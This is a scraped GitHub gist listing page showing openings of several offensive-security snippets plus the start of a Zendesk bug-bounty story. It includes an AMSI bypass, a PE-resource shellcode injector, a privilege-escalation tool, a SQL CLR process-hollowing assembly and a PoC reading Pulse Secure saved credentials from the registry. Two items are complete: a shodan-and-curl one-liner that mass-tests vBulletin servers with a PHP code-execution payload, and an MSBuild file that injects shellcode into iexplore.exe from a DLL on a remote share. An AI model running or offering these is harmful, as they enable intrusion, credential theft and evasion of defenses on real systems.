Skip to content

Instantly share code, notes, and snippets.

View unbaiat's full-sized avatar

unbaiat unbaiat

  • Unicorns United Ltd
  • Castalia
View GitHub Profile
@hackermondev
hackermondev / zendesk.md
Last active November 16, 2024 12:28
1 bug, $50,000+ in bounties, how Zendesk intentionally left a backdoor in hundreds of Fortune 500 companies

hi, i'm daniel. i'm a 15-year-old with some programming experience and i do a little bug hunting in my free time. here's the insane story of how I found a single bug that affected over half of all Fortune 500 companies:

say hello to zendesk

If you've spent some time online, you’ve probably come across Zendesk.

Zendesk is a customer service tool used by some of the world’s top companies. It’s easy to set up: you link it to your company’s support email (like [email protected]), and Zendesk starts managing incoming emails and creating tickets. You can handle these tickets yourself or have a support team do it for you. Zendesk is a billion-dollar company, trusted by big names like Cloudflare.

Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.

your weakest link

@WKL-Sec
WKL-Sec / Kernel32BaseAddrRetrieval.cpp
Created February 27, 2024 20:22
Retrieves the base address of kernel32.dll using x64 assembly in C++
#include <iostream>
#include <windows.h>
void* GetBaseAddressOfKernel32() {
void* kernel32BaseAddress = nullptr;
__asm {
mov rdi, 0xFFFFFFFFFFFFFFFF // Set RDI to -1
inc rdi // Increment RDI to 0
mov rax, 0 // Zero out RAX
@susMdT
susMdT / Program.cs
Created February 24, 2023 02:57
C# Amsi bypass with hardware breakpint
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Test
{
// CCOB IS THE GOAT
@Wra7h
Wra7h / PEResourceInject.cs
Created October 17, 2022 05:39
PEResourceInject
/*
* PEResourceInject (C# version for x64) by Wra7h
*
* Add a bitmap resource to an executable. Parse the PE header and calculate the address of the shellcode.
* This avoids direct calls to VirtualAllocEx & WriteProcessMemory, but will modify the target exe on disk,
* and this implementation will create a backup of the executable in the same directory with a ".bak" extension.
*
* Compile: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe .\PEResourceInject.cs
* Use: PEResourceInject.exe <C:\Path\to\target\program.exe> <C:\Path\to\shellcode.bin>
*
// TcbElevation - Authors: @splinter_code and @decoder_it
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#pragma comment(lib, "Secur32.lib")
void EnableTcbPrivilege(BOOL enforceCheck);
@skahwah
skahwah / hollow.cs
Last active March 20, 2024 07:55
Custom assembly that is compatible with SQL CLR attacks.
//C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\hollow.cs
//SQLRecon.exe /auth:local /host:SQL02 /username:sa /password:Password123 /module:clr /dll:c:\temp\hollow.dll /function:BaconTime
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using Microsoft.SqlServer.Server;
@unbaiat
unbaiat / CVE-2020-8956.ps1
Created October 29, 2020 07:53 — forked from qkaiser/CVE-2020-8956.ps1
CVE-2020-8956 - Powershell PoC
Add-Type -AssemblyName System.Security;
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
$ivename = $ive.PSPath.split('\')[-1].ToUpper()
Write-Host "[+] Checking IVE $($ivename)..."
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
# 3 possible value names for password
$encrypted = $ive.Password1
if(!$encrypted){
@qkaiser
qkaiser / CVE-2020-8956.ps1
Created October 27, 2020 20:07
CVE-2020-8956 - Powershell PoC
Add-Type -AssemblyName System.Security;
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
$ivename = $ive.PSPath.split('\')[-1].ToUpper()
Write-Host "[+] Checking IVE $($ivename)..."
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
# 3 possible value names for password
$encrypted = $ive.Password1
if(!$encrypted){
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MyTarget">
<SimpleTask MyProperty="My voice is my passport."
MyCode='<base64 encoded x64 shellcode>'
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
</Target>
<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>